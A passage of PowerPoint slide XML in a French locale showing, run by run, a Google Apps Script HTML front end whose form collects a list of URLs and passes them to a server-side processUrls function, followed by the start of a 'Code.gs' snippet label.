              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        var data = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>FormData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>google.script.run.withSuccessHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>displayResults</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>processUrls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Object.fromEntries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>data.entries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>()));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>displayResults</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>result.action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> === '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>complete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>') {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>('message').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>textContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Done</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls-form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>event.preventDefault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>processForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      &lt;label for="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"&gt;URLs:&lt;/label&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="10" cols="50"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    &lt;div id="message"&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C4043"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle : coins arrondis 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E67448-38F8-76E3-4146-F87C39BBFA51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765119" y="959412"/>
            <a:ext cx="3619499" cy="40832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1000" b="1" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0"/>
              <a:t> (Code.gs):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
